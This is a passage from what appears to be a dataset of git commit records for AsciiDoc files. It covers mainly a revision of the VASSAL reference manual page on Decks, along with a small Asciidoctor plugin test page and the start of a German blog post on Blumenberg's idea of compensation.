SpEL-expressions are supported\n| `+++\"*#{application.name}* (#{application.id}) is *#{to.status}*\"+++`\n|\n|===\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1e9bc17f2bf178a779608e8c66fd0a7cd134a7b8","subject":"adding page title and description","message":"adding page title and description\n","repos":"asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin","old_file":"testData\/psi\/antoraModule\/componentV1\/modules\/module\/pages\/page.adoc","new_file":"testData\/psi\/antoraModule\/componentV1\/modules\/module\/pages\/page.adoc","new_contents":"= The page in the other module\n:description: a description\n:page-aliases: ROOT:oldpagename.adoc\n","old_contents":":page-aliases: ROOT:oldpagename.adoc\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"04ab7fe6b656dccd4cb9aea30cf20daeb512b81e","subject":"Deck Documentation update","message":"Deck Documentation update\n","repos":"ethaneldridge\/vassal,ethaneldridge\/vassal,ethaneldridge\/vassal","old_file":"vassal-doc\/src\/main\/readme-referencemanual\/ReferenceManual\/Deck.adoc","new_file":"vassal-doc\/src\/main\/readme-referencemanual\/ReferenceManual\/Deck.adoc","new_contents":"== VASSAL Reference Manual\n[#top]\n\n[.small]#<<index.adoc#toc,Home>> > <<GameModule.adoc#top,Module>> > <<Map.adoc#top,Map>> > *Deck*#\n\n'''''\n\n=== Deck\n\nA Deck functions like a deck of playing cards, but can also be used to hold a supply of other types of <<GamePiece.adoc#top,Game Piece>>, such as a fixed supply of counters or a \"bag of chits\" to be randomly drawn from.\n Each game begins with the contents of the Deck as specified in the Configuration window.\nDuring a game, players may remove cards from the deck by dragging them from the top of the deck with the mouse.\nThis removes a card from the Deck and assigns ownership to the dragging player.\nDragging a card onto the deck adds it back to the Deck.\n\nThe number of cards or pieces in the deck is exposed as a Map-level <<Properties.adoc#top,Property>> with the name _<name>_numPieces._ +\nThe number of card or piece types in the deck can be exposed as a Map-level <<Properties.adoc#top,Property>> with the name _<name>_<type>_ (see Perform Counting of Piece Types below).\n\nDecks can be added to <<Map.adoc#top,Maps>>, and also to <<PlayerHand.adoc#top,Player Hands>> and <<PrivateWindow.adoc#top,Private Windows>>, each of which is simply a specialized type of Map.\nTo add a Deck, navigate to the _[Map]_, _[Player Hand]_, or _[Private Window]_ component entry in the Editor configuration window for the Map (or specialized map) you wish to add the Deck to.\nRight-click on that component and select _Add Deck_ from the menu.\nAfter you have configured your Deck and clicked the OK button, your new _[Deck]_ component will appear at the bottom of the map's list of Sub-Components.\nYou can then right-click on the _[Deck]_ entry and begin adding Cards and other Deck Sub-Components.\n\nNOTE: Because Decks are quite often used to hold \"cards\", the Game Pieces contained within a Deck will be frequently referred to in Vassal and in documentation as \"cards\". 
However, keep in mind that a \"card\" is simply a type of Game Piece, and a Deck can be used to contain _any_ type of Game Piece.\nThe difference between a \"card\" and a \"piece\" is only notional, and perhaps represented in the artwork and function of the piece\/card.\n\n\n*EXAMPLE:* An ordinary deck of playing cards for, say, Crazy Eights would be set to: _Allow Multiple = false_, _Allow Specific = false_, _Face Down = Always_, _Re-shuffle = Always_, _Reversible = false_.\nThe discard pile would be: _Allow Multiple = false_, _Allow Specific = false_, _Face Down = Never_, _Re-shuffle = Never_, _Reversible = false_.\n\nA Deck may contain any kind of Game Piece, so it can also be used for draw piles of chits or counters that are drawn randomly and whose total number is limited by the game.\nIf the pieces\/cards do not need to be selected randomly and you simply wish to provide a pile of them on the board at game start, consider an <<SetupStack.adoc#top,At-Start Stack>>.\n\n*EXAMPLE:* A strategic game in which a nationality has a fixed force pool of variable-strength Infantry, Armor, etc.\ncounters can be modeled by making a Map Window representing the force pool, with a Deck of Infantry counters, a Deck of Armor counters, etc.\nThe decks would be set to _Allow Multiple = false_, _Allow Specific = false_, _Face Down = Never_, _Re-shuffle = Never_, _Reversible = false_.\nIn order to guarantee that the number of each type of counter is fixed, any Clone and Delete traits of the Infantry and Armor counters should be removed.\n\n*EXAMPLE:* You want to create a deck of playing cards and display the number of red cards, the number of black cards, the number of face cards, and the total number of cards in the deck.\nCreate the Deck, check _Perform counting of expressions_.\nAdd the expressions of _red: color = red_ and _black: color = black_.\nAlso add the expression _facecards: value > 10_.\nWhen creating your cards, give them a <<PropertyMarker.adoc#top,Marker>> trait named _color_ with the values of _red_ or _black_ depending on the card.\nAlso give your cards a Marker trait named _value_ with the numeric value of the card.\nThen, you can refer to the counts with the map-level properties of _<deckname>_red_, _<deckname>_black_, and _<deckname>_facecards_.\nThe total number of cards currently in the deck can be referenced by the map-level property of _<deckname>_numPieces_.\n\n[width=\"100%\",cols=\"50%a,^50%a\",]\n|===\n|*Name:*:: The name of a Deck is not used during game play.\nIt is only used for identification in the Editor.\nThe name should be unique.\nIf multiple decks with the same name are created, the Return to Deck trait will send cards to the first deck with that name.\n\n*Belongs to board:*:: If a name is selected, the Deck will appear on that particular <<Board.adoc#top,Board>>.
If a game does not use that Board, then the Deck will not appear.\nIf \"<any>\" is selected, then the Deck will always appear at the given position, regardless of the boards in use.\n\n*X,Y position:*:: The position in the Map Window of the center of the deck.\nIf this Deck belongs to a Board, the position is relative to the Board's position in the Map Window.\n\n*Width, Height:*:: The size of the \"tray\" holding the cards.\nIf the Deck is empty, this determines the area into which players may drag cards to add them back to the Deck, as well as the box drawn if the _Draw Outline When Empty_ option is selected below.\nIt should be set to approximately the same size as the cards the Deck will hold.\n\n*Allow multiple cards to be drawn:*:: Adds a right-click context menu entry to the Deck's context menu that prompts the user to specify the number of cards to be drawn from the Deck with the next drag.\n\n*Menu command to draw multiple:*:: The text of the menu option to draw multiple cards from the deck when the draw multiple option is selected.\n\n*Allow specific cards to be drawn:*:: Adds a right-click context menu entry to the Deck's context menu that allows the player to examine the Deck and select exactly which cards will be drawn from the deck with the next drag.\n\n*Menu command to draw specific:*:: The text of the menu option to draw specific cards from the deck when the draw specific option is selected.\n\n*When selecting, list cards using:*:: When the player is prompted to select specific cards from the Deck, individual cards will be listed using the specified <<MessageFormat.adoc#top,Message Format>>.\n\n*When selecting, sort cards by:*:: When the player is prompted to select specific cards from the deck, the cards can optionally be sorted (alphabetically) using the listed property.\nLeave blank to list cards by their current position in the deck.\n+\nNOTE: Unlike the previous field this field simply names a single property, and should not use $..$ markers. To sort by multiple fields a <<CalculatedProperty.adoc#top,Calculated Property>> trait e.g. _SortName_ can be created and serve to concatenate the various fields in an appropriate order.\n+\n*Example:* cards in a deck can use a <<PropertyMarker.adoc#top,Marker>> trait to specify a card number (001,002, etc.) and always list cards in order of their assigned number: in this case simply fill _CardNum_ into the field, no $..$.\n\n*Contents are face-down:*:: Determines whether cards in the Deck are always drawn face-down, always drawn face-up, or can be switched from face-up to face-down with a right-click context menu entry.\n\n*Menu command to turn deck face up:*:: Text of the menu command to change the facing of subsequent cards drawn from the deck to face up.\n\n*Menu command to turn deck face down:*:: Text of the menu command to change the facing of subsequent cards drawn from the deck to face down.\n\n*Draw new cards face up:*:: If checked, then cards drawn from this Deck (e.g. 
by dragging them) will be placed face-up on the playing area.\nIf unchecked, then cards from a face-down deck are drawn face down and owned by the drawing player.\n\n*Face down report format:*:: A <<MessageFormat.adoc#top,Message Format>> that is echoed to the chat log whenever a player selects the _Face Down_ menu item (if enabled above): _deckName_ is the name of this deck, _commandName_ is the name of the menu item.\n\n*Re-shuffle:*:: If set to _Never_ then cards remain in their original order; cards are drawn from and added to the top.\nIf set to _Always_ then cards are always drawn randomly from the deck.\nIf set to _Via right-click menu_ then a _Shuffle_ entry is added to the Deck's right-click context menu.\n\n*Re-shuffle menu command:*:: The right-click context menu entry for reshuffling the Deck.\n\n*Re-shuffle report format:*:: A <<MessageFormat.adoc#top,Message Format>> that is echoed to the chat log whenever a player selects the _Shuffle_ menu item (if enabled above): _deckName_ is the name of this Deck, _commandName_ is the name of the context menu item.\n\n*Re-shuffle hotkey:*:: A <<NamedKeyStroke.adoc#top,Keystroke or Named Command>> that will cause a reshuffle.\nIf left blank, a reshuffle can be caused only with the right-click context menu.\n\n*Reversible:*:: Adds an entry to the right-click context menu that reverses the order of cards in the Deck.\n\n*Reverse menu command:*:: The right-click context menu entry for reversing the Deck.\n\n*Reverse report format:*:: A <<MessageFormat.adoc#top,Message Format>> that is echoed to the chat log window whenever a player selects the \"Reverse\" menu item: _deckName_ is the name of this deck, _commandName_ is the name of the menu item.\n\n*Reverse hotkey:*:: A <<NamedKeyStroke.adoc#top,Keystroke or Named Command>> that will cause a reverse.\n\n*Draw Outline When Empty?*:: Whether to draw the \"tray\" for the cards.\nThe \"tray\" is a rectangle of size _width,height_ centered at _x,y_.\nOnly drawn when there are no cards in the Deck, to indicate where to drag cards to place them back in the Deck.\nMay not be necessary or desirable if the Map Window contains a board on which the tray is already shown.\n\n*Color:*:: The color used to draw the rectangle representing the \"tray\" above.\n\n*Hotkey to send when Deck empties:*:: Select the <<NamedKeyStroke.adoc#top,Keystroke Command or Named Command>> to send whenever enough cards are removed from the Deck to empty it.\n\n*Include command to send entire deck to another deck:*:: If checked, the right-click context menu for this Deck will include a command that sends every Game Piece in this Deck to a different designated Deck.\nFor example, this can be used to reshuffle a discard pile into its original deck.\nThe following four attributes are used to configure this option.\n\n*Send menu command:*:: The text for the right-click context menu item.\n\n*Send report format:*:: A <<MessageFormat.adoc#top,Send Message Format>> that is echoed to the chat log window whenever a player selects the \"send to another deck\" menu item: _deckName_ is the name of this deck, _commandName_ is the name of the menu item.\n\n*Send Hotkey:*:: Select a <<NamedKeyStroke.adoc#top,Keystroke Command or Named Command>> that will cause the Deck contents to be moved to the target Deck.\n\n*Name of deck to send to:*:: The name of the Deck that the contents of this Deck will be sent to.\n\n*Can be saved-to\/loaded-from a file:*:: If selected, the right-click context menu will include _Save_ and _Load_ actions.\nThe 
_Save_ action saves the contents of a deck to a file.\nThe _Load_ action replaces the contents of the deck with the cards specified in the file.\nSaved decks can be loaded into an entirely different game than the one used to save the deck.\nThis option is useful for collectible card games, in which a player may prepare a deck offline in preparation for a game.\n\n*Maximum cards to be displayed in stack:*:: This defines the maximum number of cards to graphically display in the Deck.\nThe default is 10.\nFor example, if set to 10, a deck of 52 cards will appear to have 10 cards, until the actual number of contents drops below 10.\nThen the deck will visually start to shrink as cards are removed.\nIf set to 1, the deck will always appear flat as if it held only a single card.\n\n*Perform counting of property expressions:*:: Enable processing of property expression counting.\nExpressions must be defined.\n\n*Expressions to count:*:: Specify expressions to be counted within the deck.\nThese can be whatever you like and must be in the format of:\n+\n....\n<expression name> : <expression>\n....\n+\nFor each expression, a map-level property called __<deckName>_<expression name>__ is exposed.\nThe exposed value is the number of pieces for which that expression evaluates to _true_.\nAn example of how to do this is provided below.\n\nNOTE: Currently, the only \"dynamic\" property which can be used in counting expressions is _playerSide_.\nOther dynamic properties will most likely not update if they change after pieces move into a deck.\n\n*Restrict adding counters by Drag 'n Drop:*::\nWhen selected, you can add an expression that Cards must satisfy before they can be added to a Deck manually by Drag 'n Drop movement. If a Player drops a card onto the Deck that does not satisfy the expression, then the card will 'snap' back to where it was dragged from.\n\nNOTE: This option does NOT affect cards being added to the Deck by any mechanism other than manual Drag 'n Drop.\n\n*Dropped counters must match expression:*::\nEnter a <<PropertyMatchExpression.adoc#top,Property Match Expression>> that, when evaluated against each Card, must evaluate to true to allow the Card to be added to the Deck.\n\n|image:images\/Deck.png[]\n\n|===\n\n'''''\n\n=== Sub-Components\n\nSub-Components can be added to a Deck by right-clicking on the _[Deck]_ entry in the Module Editor and selecting the appropriate _Add_ option.\n\n[width=\"100%\",cols=\"50%a,^50%a\",]\n|===\na|\n==== <<GamePiece.adoc#top,Card>>\n\nA Card is identical to a Game Piece, but is initialized with a <<Mask.adoc#top,Mask>> trait appropriate for a playing card.\n\n==== <<DeckGlobalKeyCommand.adoc#top,Deck Global Key Command>>\n\nGlobal Key Commands can be added to a Deck and will appear in the right-click context menu of the Deck.\nThe resulting Global Key Command will be applied _only_ to pieces contained in the Deck.\n\n==== <<DeckSendKeyCommand.adoc#top,Deck Send Key Command>>\nA Deck Send Key Command adds a command to the right-click context menu of the Deck that provides extended options for sending cards in this Deck to another Deck.\n\n==== <<DeckSortKeyCommand.adoc#top,Deck Sort Key Command>>\nA Deck Sort Key Command adds a command to the right-click context menu of the Deck that allows the Deck to be sorted based on the values of properties on the contained cards.\n\n|image:images\/DeckAdd.png[] +\n|===\n\n","old_contents":"== VASSAL Reference Manual\n[#top]\n\n[.small]#<<index.adoc#toc,Home>> > <<GameModule.adoc#top,Module>> >
<<Map.adoc#top,Map>> > *Deck*#\n\n'''''\n\n=== Deck\n\nA Deck functions like a deck of playing cards, but can also be used to hold a supply of other types of <<GamePiece.adoc#top,Game Piece>>, such as a fixed supply of counters or a \"bag of chits\" to be randomly drawn from.\n Each game begins with the contents of the Deck as specified in the Configuration window.\nDuring a game, players may remove cards from the deck by dragging them from the top of the deck with the mouse.\nThis removes a card from the Deck and assigns ownership to the dragging player.\nDragging a card onto the deck adds it back to the Deck.\n\nThe number of cards or pieces in the deck is exposed as a Map-level <<Properties.adoc#top,Property>> with the name _<name>_numPieces._ +\nThe number of card or piece types in the deck can be exposed as a Map-level <<Properties.adoc#top,Property>> with the name _<name>_<type>_ (see Perform Counting of Piece Types below).\n\nDecks can be added to <<Map.adoc#top,Maps>>, and also to <<PlayerHand.adoc#top,Player Hands>> and <<PrivateWindow.adoc#top,Private Windows>>, each of which is simply a specialized type of Map.\nTo add a Deck, navigate to the _[Map]_, _[Player Hand]_, or _[Private Window]_ component entry in the Editor configuration window for the Map (or specialized map) you wish to add the Deck to.\nRight-click on that component and select _Add Deck_ from the menu.\nAfter you have configured your Deck and clicked the OK button, your new _[Deck]_ component will appear at the bottom of the map's list of Sub-Components.\nYou can then right-click on the _[Deck]_ entry and begin adding Cards and other Deck Sub-Components.\n\nNOTE: Because Decks are quite often used to hold \"cards\", the Game Pieces contained within a Deck will be frequently referred to in Vassal and in documentation as \"cards\". 
However keep in mind that a \"card\" is simply a type of Game Piece, and a Deck can be used to contain _any_ type of Game Piece.\nThe difference between a \"card\" and a \"piece\" is only notional, and perhaps represented in the artwork and function of the piece\/card.\n\n\n*EXAMPLE:* An ordinary deck of playing cards for, say, Crazy Eights would be set to: _Allow Multiple = false_, _Allow Specific = false_, _Face Down = Always_, _Re-shuffle = Always_, _Reversible = false_.\nThe discard pile would be: _Allow Multiple = false_, _Allow Specific = false_, _Face Down = Never_, _Re-shuffle = Never_, _Reversible = false_.\n\nA Deck may contain any kind of Game Piece, so it can also be used for draw piles of chits or counters that are drawn randomly and whose total number are limited by the game.\nIf the pieces\/cards do not need to be selected randomly and you simply wish to provide a pile of them on the board at game start, consider an <<SetupStack.adoc#top,At-Start Stack>>.\n\n*EXAMPLE:* A strategic game in which a nationality has a fixed force pool of variable-strength Infantry, Armor, etc.\ncounters can be modeled by making a Map Window representing the force pool, with a Deck of Infantry counters, a Deck of Armor counters, etc.\nThe decks would be set to _Allow Multiple = false_, _Allow Specific = false_, _Face Down = Never_, _Re-shuffle = Never_, _Reversible = false_.\nIn order to guarantee that the number of each type of counter is fixed, any Clone and Delete traits of the Infantry and Armor counters should be removed.\n\n*EXAMPLE:* You want to create a deck of playing cards and display the number of red cards, the number of black cards, the number of face cards, and the total number of cards in the deck.\nCreate the Deck, check _Perform counting of expressions_.\nAdd the expressions of _red: color = red_ and _black: color = black_.\nAlso add the expression _facecards: value > 10_.\nWhen creating your cards, give them a <<PropertyMarker.adoc#top,Marker>> trait named _color_ with the values of _red_ or _black_ depending on the card.\nAlso give your cards a Marker trait named _value_ with the numeric value of the card.\nThen, you can refer to the counts with the map-level properties of _<deckname>_red_, _<deckname>_black_, and _<deckname>_facecards_.\nThe total number of cards currently in the deck can be referenced by the map-level property of _<deckname>_numPieces_.\n\n[width=\"100%\",cols=\"50%a,^50%a\",]\n|===\n|*Name:*:: The name of a Deck is not used during game play.\nIt is only used for identification in the Editor.\nThe name should be unique.\nIf multiple decks with the same name are created the return to deck trait will send cards to the first deck with that name.\n\n*Belongs to board:*:: If a name is selected, the Deck will appear on that particular <<Board.adoc#top,Board>>. 
If a game does not use that Board, then the Deck will not appear.\nIf \"<any>\" is selected, then the Deck will always appear at the given position, regardless of the boards in use.\n\n*X,Y position:*:: The position in the Map Window of the center of the deck.\nIf this Deck belongs to a Board, the position is relative to the Board's position in the Map Window.\n\n*Width, Height:*:: The size of the \"tray\" holding the cards.\nIf the Deck is empty, this determines the area into which players may drag cards to add them back to the Deck, as well as the box drawn if the _Draw Outline When Empty_ option is selected below.\nIt should be set to approximately the same size as the cards the Deck will hold.\n\n*Allow multiple cards to be drawn:*:: Adds a right-click context menu entry to the Deck's context menu that prompts the user to specify the number of cards to be drawn from the Deck with the next drag.\n\n*Menu command to draw multiple:*:: The text of the menu option to draw multiple cards from the deck when the draw multiple option is selected.\n\n*Allow specific cards to be drawn:*:: Adds a right-click context menu entry to the Deck's context menu that allows the player to examine the Deck and select exactly which cards will be drawn from the deck with the next drag.\n\n*Menu command to draw specific:*:: The text of the menu option to draw specific cards from the deck when the draw specific option is selected.\n\n*When selecting, list cards using:*:: When the player is prompted to select specific cards from the Deck, individual cards will be listed using the specified <<MessageFormat.adoc#top,Message Format>>.\n\n*When selecting, sort cards by:*:: When the player is prompted to select specific cards from the deck, the cards can optionally be sorted (alphabetically) using the listed property.\nLeave blank to list cards by their current position in the deck.\n+\nNOTE: Unlike the previous field this field simply names a single property, and should not use $..$ markers. To sort by multiple fields a <<CalculatedProperty.adoc#top,Calculated Property>> trait e.g. _SortName_ can be created and serve to concatenate the various fields in an appropriate order.\n+\n*Example:* cards in a deck can use a <<PropertyMarker.adoc#top,Marker>> trait to specify a card number (001,002, etc.) and always list cards in order of their assigned number: in this case simply fill _CardNum_ into the field, no $..$.\n\n*Contents are face-down:*:: Determines whether cards in the Deck are always drawn face-down, always drawn face-up, or can be switched from face-up to face-down with a right-click context menu entry.\n\n*Menu command to turn deck face up:*:: Text of the menu command to change the facing of subsequent cards drawn from the deck to face up.\n\n*Menu command to turn deck face down:*:: Text of the menu command to change the facing of subsequent cards drawn from the deck to face down.\n\n*Draw new cards face up:*:: If checked, then cards drawn from this Deck (e.g. 
by dragging them) will be placed face-up on the playing area.\nIf unchecked, then cards from a face-down deck are drawn face down and owned by the drawing player.\n\n*Face down report format:*:: A <<MessageFormat.adoc#top,Message Format>> that is echoed to the chat log whenever a player selects the _Face Down_ menu item (if enabled above): _deckName_ is the name of this deck, _commandName_ is the name of the menu item.\n\n*Re-shuffle:*:: If set to _Never_ then cards remain in their original order; cards are drawn from and added to the top.\nIf set to _Always_ then cards are always drawn randomly from the deck.\nIf set to _Via right-click menu_ then a _Shuffle_ entry is added to the Deck's right-click context menu.\n\n*Re-shuffle menu command:*:: The right-click context menu entry for reshuffling the Deck.\n\n*Re-shuffle report format:*:: A <<MessageFormat.adoc#top,Message Format>> that is echoed to the chat log whenever a player selects the _Shuffle_ menu item (if enabled above): _deckName_ is the name of this Deck, _commandName_ is the name of the context menu item.\n\n*Re-shuffle hotkey:*:: A <<NamedKeyStroke.adoc#top,Keystroke or Named Command>> that will cause a reshuffle.\nIf left blank, a reshuffle can be caused only with the right-click context menu.\n\n*Reversible:*:: Adds an entry to the right-click context menu that reverses the order of cards in the Deck.\n\n*Reverse menu command:*:: The right-click context menu entry for reversing the Deck.\n\n*Reverse report format:*:: A <<MessageFormat.adoc#top,Message Format>> that is echoed to the chat log window whenever a player selects the \"Reverse\" menu item: _deckName_ is the name of this deck, _commandName_ is the name of the menu item.\n\n*Reverse hotkey:*:: A <<NamedKeyStroke.adoc#top,Keystroke or Named Command>> that will cause a reverse.\n\n*Draw Outline When Empty?*:: Whether to draw the \"tray\" for the cards.\nThe \"tray\" is a rectangle of size _width,height_ centered at _x,y_.\nOnly drawn when there are no cards in the Deck, to indicate where to drag cards to place them back in the Deck.\nMay not be necessary or desirable if the Map Window contains a board on which the tray is already shown.\n\n*Color:*:: The color used to draw the rectangle representing the \"tray\" above.\n\n*Hotkey to send when Deck empties:*:: Select the <<NamedKeyStroke.adoc#top,Keystroke Command or Named Command>> to send whenever enough cards are removed from the Deck to empty it.\n\n*Include command to send entire deck to another deck:* If checked, the right-click context menu for this Deck will include a command that sends every Game Piece in this Deck to a different designated Deck.\nFor example, this can be used to reshuffle a discard pile into its original deck.\nThe following four attributes are used to configure this option.\n\n*Send menu command:*:: The text for the right-click context menu item.\n\n*Send report format:*:: A <<MessageFormat.adoc#top,Send Message Format>> that is echoed to the chat log window whenever a player selects the \"send to another deck\" menu item: _deckName_ is the name of this deck, _commandName_ is the name of the menu item.\n\n*Send Hotkey:*:: Select a <<NamedKeyStroke.adoc#top,Keystroke Command or Named Command>> that will cause the Deck contents to be moved to the target Deck.\n\n*Name of deck to send to:*:: The name of the Deck that the contents of this Deck will be sent to.\n\n*Can be saved-to\/loaded-from a file:*:: If selected, the right-click context menu will include _Save_ and _Load_ actions.\nThe _Save_ 
action saves the contents of a deck to a file.\nThe _Load_ action replaces the contents of the deck with the cards specified in the file.\nSaved decks can be loaded into an entirely different game than the one used to save the deck.\nThis option is useful for collectible card games, in which a player may prepare a deck offline in preparation for a game.\n\n*Maximum cards to be displayed in stack:*:: This defines the maximum number of cards to graphically display in the Deck.\nThe default is 10.\nFor example, if set to 10, a deck of 52 cards will appear to have 10 cards, until the actual number of contents drops below 10.\nThen the deck will visually start to shrink as cards are removed.\nIf set to 1, the deck will always appear flat as if it held only a single card.\n\n*Perform counting of property expressions:*:: Enable processing of property expression counting.\nExpressions must be defined.\n\n*Expressions to count:*:: Specify expressions to be counted within the deck.\nThese can be whatever you like and must be in the format of:\n+\n....\n<expression name> : <expression>\n....\n+\nFor each expression, a map-level property called __<deckName>_<expression name>__ is exposed.\nThe exposed value is number of pieces for which that expression evaluates to _true_.\nAn example of how to do this is provided below.\n\nNOTE: Currently the only \"dynamic\" property which can be used in counting expressions is _playerSide_.\nOther dynamic properties will most likely not update if they change after pieces move into a deck.\n\n\n|image:images\/Deck.png[]\n\n|===\n\n'''''\n\n=== Sub-Components\n\nSub-Components can be added to a Deck by right-clicking on the _[Deck]_ entry in the Module Editor and selecting the appropriate _Add_ option.\n\n[width=\"100%\",cols=\"50%a,^50%a\",]\n|===\na|\n==== <<GamePiece.adoc#top,Card>>\n\nA Card is identical to a Game Piece, but is initialized with a <<Mask.adoc#top,Mask>> trait appropriate for a playing card.\n\n==== <<DeckGlobalKeyCommand.adoc#top,Deck Global Key Command>>\n\nGlobal Key Commands can be added to a Deck and will appear in the right-click context menu of the Deck.\nThe resulting Global Key Command will be applied _only_ to pieces contained in the Deck.\n\n==== <<DeckSendKeyCommand.adoc#top,Deck Send Key Command>>\nA Deck Send Key Command adds a command to the right-click context menu of the Deck that provides extended options for sending cards in this Deck to another Deck.\n\n==== <<DeckSortKeyCommand.adoc#top,Deck Sort Key Command>>\nA Deck Sort Key Commands adds a command to the right-click context menu of the Deck that allows the Deck to be sorted based on the values of properties on the contained cards.\n\n|image:images\/DeckAdd.png[] +\n|===\n\n","returncode":0,"stderr":"","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"b765616720e5bdc90216a957b3dc1998d90de4e6","subject":"Update 2016-07-09-Unspezifitat-und-Risiko-komplexer-Kompensation.adoc","message":"Update 2016-07-09-Unspezifitat-und-Risiko-komplexer-Kompensation.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2016-07-09-Unspezifitat-und-Risiko-komplexer-Kompensation.adoc","new_file":"_posts\/2016-07-09-Unspezifitat-und-Risiko-komplexer-Kompensation.adoc","new_contents":"# Unspezifit\u00e4t und Risiko komplexer Kompensation\n:hp-tags: Kompensation, Blumenberg,\n\nIn seinem Blog http:\/\/www.reis.space[Critical Otter Studies] unterscheidet _@reisagainst_\nzwei Arten von 
Kompensation:\n\n> 1. Ein Leistungsverlust wird von einem System durch erh\u00f6hte Aktivit\u00e4t ausgeglichen\n> (zB. eines Organs) - nennen wir das primitive Kompensation\n>\n> 2. Eine Funktion, die bisher auf primitivere Weise gel\u00f6st wurde, wird nun durch\n> Auslagerung scheinbar aufgegeben und in komplexerer Weise erf\u00fcllt.\n>\n> http:\/\/www.reis.space\/jekyll\/update\/2016\/06\/30\/kompensation.html[\u2013 Critical Otter Studies \u2013 *Kompensation und poetisches Lesen*]\n\nLetzteres aber erfordert vorerst eine _wirkliche_ Aufgabe, die nur nach erfolgreicher Auslagerung der Funktion zur scheinbaren wird.\nDeren Gelingen kann nicht vorhergesagt werden, da eine komplexe Kompensation von einem nicht-komplexen Standpunkt keiner Beurteilung zug\u00e4ngig ist. In diesem Sinne ist Kompensation immer unspezifisch und risikoreich. Die Frage ist nun: Weshalb kommt es zu einer solchen Gef\u00e4hrdung?\n\nMit dem _Dilemma der H\u00f6hle_ f\u00e4ngt alles an. Trotz deren defizit\u00e4ren Angepa\u00dftheit bot die H\u00f6hle Schutz und Obdach auch den Schwachen und Kranken.\n\n> Diese Kinder der H\u00f6hle, die niemals das Recht der St\u00e4rkeren und das der jagenden Ern\u00e4hrer\n> f\u00fcr sich geltend machen konnte, erfanden den Mechanismus der Kompensation.\n>\n> \u2013 Hans Blumenberg: *H\u00f6hlenausg\u00e4nge*, Frankfurt a.M., 2. Aufl., 1989, *28*\n\nWeil die H\u00f6hle zur Nahrungssuche zu verlassen, ihnen nicht m\u00f6glich ist, ersetzen sie den Bericht \u00fcber Geschehenes durch die Erz\u00e4hlung von Erdachtem.\nIst die Sprache des J\u00e4gers von den N\u00f6ten der Wirklichkeit, aber vor allem der Selbsterhaltung gepr\u00e4gt, kompensiert der Schwache\nLeistungs- und Erfahrungsdefizit mit der sprachlichen Konstruktion von Wirklichkeiten\nund transformiert derma\u00dfen die Bedingungen, d.h. Bewertungskriterien, zu _Narrationen als\nNarrativen_. Konnte der Bericht zuvor nur _als_ Bericht an seinen eigenen Gelingenskriterien bewertet werden,\nmu\u00df er sich nun als sinnstiftende Erz\u00e4hlform neben anderen beweisen.\n\nAls primitive Kompensation kann die Erz\u00e4hlung \u2013 und sei sie noch\nso gekonnt \u2013 den Bericht nicht ersetzen. Aber die konkrete Kompensation fiktiver und konjunktiver Erz\u00e4hlung bedingt und wird bedingt durch\ndie Kompensationsleistung des Narrativs. Auch der Bericht mu\u00df sich dieser zwingend unterordnen.\nDie nun m\u00f6glichen Fragen und Forderungen lassen sich nicht mehr eliminieren sondern nur ignorieren. Eine Ignoranz, die gr\u00f6\u00dfte Anstrenung zur Verdr\u00e4ngung erfordern w\u00fcrde. Das Narrativ erlaubt eine v\u00f6llig neue\nForm der _actio per distans_ (Blumenberg) und somit eine neue Art, Widerfahrnissen (Kamlah) und Widerst\u00e4nden\n(Cassirer) der Wirklichkeit zu begegnen und vor allem diese zu bew\u00e4ltigen.\n\nAus dieser Erz\u00e4hlung \u2013 deren Evidenz nicht von der \u00dcberpr\u00fcfbarkeit ihrer Aussagen an\nder Menschheitsgeschichte abh\u00e4ngt und damit selbst zum Beispiel f\u00fcr ihren Inhalt wird \u2013\nk\u00f6nnen die Erm\u00f6glichungsbedingungen komplexer Kompensation durch Auslagerung abstrahiert werden:\n\nSchutz durch Best\u00e4ndigkeit der Gemeinschaft, innerhalb derer nicht alle zugleich\nsondern vorerst nur einzelne Mitglieder zur Kompensation sich gen\u00f6tigt f\u00fchlen. 
Es gilt:\n\n> Wie so oft, beg\u00fcnstigt die Starrheit in einem Teil des Systems seine Elastizit\u00e4t in den anderen Teilen.\n>\n> \u2013 Blumenberg: *\u201eExistenzrisiko und Pr\u00e4vention\u201c*, in: *Beschreibung des Menschen*,\nFrankfurt a.M., 1. Aufl., 2016, 550-622, hier *558*\n\nWeil derart durch andere vor fatalem Scheitern (Tod) gesch\u00fctzt, k\u00f6nnen einzelne\ndas Risiko unspezifischer Kompensationsversuche wagen.\nErst bei Erfolg komplexer Kompensation durch Auslagerung und die dadurch er\u00f6ffneten M\u00f6glichkeiten\nwird die Gemeinschaft insgesamt die kompensatorischen Methoden \u00fcbernehmen.\n\n### post scriptum\n\nEs lohnt die Suche nicht, in Blumenbergs Schriften zu finden, was ich hereingelesen habe.\nMit n\u00e4rrischer Frechheit habe ich seine Ans\u00e4tze gestohlen, auf fremdes Terrain entf\u00fchrt\nund bin mit ihnen umgesprungen, als w\u00e4ren es meine eigenen.","old_contents":"# Unspezifit\u00e4t und Risiko komplexer Kompensation\n:hp-tags: Kompensation, Blumenberg,\n\n_@reisagains_ unterscheidet in seinem Blog http:\/\/www.reis.space[Critical Otter Studies]\nzwei Arten von Kompensation:\n\n> 1. Ein Leistungsverlust wird von einem System durch erh\u00f6hte Aktivit\u00e4t ausgeglichen\n> (zB. eines Organs) - nennen wir das primitive Kompensation\n>\n> 2. Eine Funktion, die bisher auf primitivere Weise gel\u00f6st wurde, wird nun durch\n> Auslagerung scheinbar aufgegeben und in komplexerer Weise erf\u00fcllt.\n>\n> http:\/\/www.reis.space\/jekyll\/update\/2016\/06\/30\/kompensation.html[\u2013Critical Otter Studies \u2013 *Kompensation und poetisches Lesen*]\n\nLetzteres aber erfordert vorerst eine _wirkliche_ Aufgabe, die nur nach erfolgreicher Auslagerung der Funktion zur scheinbaren wird.\nDeren Gelingen kann allerdings nicht vorhergesagt werden, da eine komplexe Kompensation von einem nicht-komplexen Standpunkt keiner Beurteilung zug\u00e4ngig ist. In diesem Sinne ist Kompensation immer unspezifisch und risikoreich. Die Frage ist nun: Weshalb kommt es zu einer solchen 